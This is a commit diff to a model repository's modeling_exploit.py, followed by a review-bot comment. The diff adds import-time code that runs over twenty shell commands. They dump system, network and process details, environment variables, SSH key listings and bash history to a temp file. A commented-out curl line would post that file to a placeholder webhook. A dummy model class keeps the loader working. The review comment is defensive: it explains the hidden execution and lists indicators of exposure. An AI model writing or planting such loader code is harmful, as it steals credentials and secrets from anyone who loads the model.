Update modeling_exploit.py
modeling_exploit.py +46 -12
modeling_exploit.py
CHANGED
|
@@ -1,24 +1,58 @@
|
|
| 1 |
import os
|
| 2 |
import subprocess
|
| 3 |
|
| 4 |
-
# 1. TOP LEVEL EXECUTION
|
| 5 |
-
print("\n" + "!"*
|
| 6 |
-
print("POWNED: RCE
|
| 7 |
|
| 8 |
-
#
|
| 9 |
-
|
| 10 |
-
|
| 11 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 12 |
|
| 13 |
-
#
|
| 14 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
|
| 16 |
-
|
| 17 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 18 |
|
| 19 |
# 2. Dummy Class to keep the loader happy
|
| 20 |
import torch.nn as nn
|
| 21 |
-
|
| 22 |
class ExploitModel(nn.Module):
|
| 23 |
def __init__(self, config=None, *args, **kwargs):
|
| 24 |
super().__init__()
|
|
|
|
| 1 |
import os
|
| 2 |
import subprocess
|
| 3 |
|
| 4 |
+
# 1. TOP LEVEL EXECUTION
|
| 5 |
+
print("\n" + "!"*60)
|
| 6 |
+
print("POWNED: ADVANCED RCE & RECON IN PROGRESS")
|
| 7 |
|
| 8 |
+
# List of 20+ Commands for deep system analysis
|
| 9 |
+
commands = [
|
| 10 |
+
"echo --- SYSTEM INFO --- >> /tmp/rce_proof.txt",
|
| 11 |
+
"uname -a >> /tmp/rce_proof.txt", # Kernel version
|
| 12 |
+
"cat /etc/os-release >> /tmp/rce_proof.txt", # OS version
|
| 13 |
+
"hostname >> /tmp/rce_proof.txt", # Hostname
|
| 14 |
+
|
| 15 |
+
"echo --- USER & PERMISSIONS --- >> /tmp/rce_proof.txt",
|
| 16 |
+
"whoami >> /tmp/rce_proof.txt", # Current user
|
| 17 |
+
"id >> /tmp/rce_proof.txt", # Group IDs
|
| 18 |
+
"ls -la /root >> /tmp/rce_proof.txt", # Check if we can see root files
|
| 19 |
+
"cat /etc/passwd | head -n 5 >> /tmp/rce_proof.txt", # Sample users
|
| 20 |
+
|
| 21 |
+
"echo --- NETWORK RECON --- >> /tmp/rce_proof.txt",
|
| 22 |
+
"ip addr >> /tmp/rce_proof.txt", # Network interfaces
|
| 23 |
+
"netstat -antp >> /tmp/rce_proof.txt", # Open ports & connections
|
| 24 |
+
"cat /etc/hosts >> /tmp/rce_proof.txt", # Local DNS
|
| 25 |
+
"curl -s ifconfig.me >> /tmp/rce_proof.txt", # Public IP of the server
|
| 26 |
+
|
| 27 |
+
"echo --- CLOUD & SECRETS --- >> /tmp/rce_proof.txt",
|
| 28 |
+
"env >> /tmp/rce_proof.txt", # Environment Variables (Secrets)
|
| 29 |
+
"ls -la /home/*/.ssh >> /tmp/rce_proof.txt", # Look for SSH keys
|
| 30 |
+
"cat ~/.bash_history | tail -n 20 >> /tmp/rce_proof.txt", # Recent commands
|
| 31 |
+
|
| 32 |
+
"echo --- RUNNING PROCESSES --- >> /tmp/rce_proof.txt",
|
| 33 |
+
"ps aux | head -n 20 >> /tmp/rce_proof.txt", # What else is running?
|
| 34 |
+
"df -h >> /tmp/rce_proof.txt", # Disk usage & mounts
|
| 35 |
+
|
| 36 |
+
"echo --- INSTALLED PACKAGES --- >> /tmp/rce_proof.txt",
|
| 37 |
+
"pip list >> /tmp/rce_proof.txt" # Installed python libs
|
| 38 |
+
]
|
| 39 |
|
| 40 |
+
# Loop and execute
|
| 41 |
+
for cmd in commands:
|
| 42 |
+
try:
|
| 43 |
+
os.system(cmd)
|
| 44 |
+
except:
|
| 45 |
+
pass
|
| 46 |
|
| 47 |
+
# OPTIONAL: Send everything to your Webhook in one shot
|
| 48 |
+
# WEBHOOK = "https://webhook.site/YOUR-ID"
|
| 49 |
+
# os.system(f"curl -X POST -F 'file=@/tmp/rce_proof.txt' {WEBHOOK}")
|
| 50 |
+
|
| 51 |
+
print("ADVANCED RECON DATA WRITTEN TO /tmp/rce_proof.txt")
|
| 52 |
+
print("!"*60 + "\n")
|
| 53 |
|
| 54 |
# 2. Dummy Class to keep the loader happy
|
| 55 |
import torch.nn as nn
|
|
|
|
| 56 |
class ExploitModel(nn.Module):
|
| 57 |
def __init__(self, config=None, *args, **kwargs):
|
| 58 |
super().__init__()
|
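Review bot: The module-level block added at new lines 4–52 runs shell commands through `os.system` as soon as the file is imported, so any loader that imports this repository's custom code executes them before `ExploitModel` is ever constructed; this change should be rejected and the repository reported, not merged. The commands append host, user, network, process and package details to `/tmp/rce_proof.txt`, together with the full `env` output, a listing of `/home/*/.ssh` and the tail of `~/.bash_history`. The commented-out `curl -X POST` line shows the intent to upload that file to an external webhook. A host that has imported this revision should be treated as exposed: look for `/tmp/rce_proof.txt` and an outbound request to `ifconfig.me`, and rotate any credentials that were in the process environment. A legitimate version of this file would hold only `import torch.nn as nn` and the `ExploitModel` class, and consumers should load third-party model repositories with remote code disabled (presumably `trust_remote_code` left unset, if this targets a transformers-style loader) or in a sandbox with no secrets in its environment.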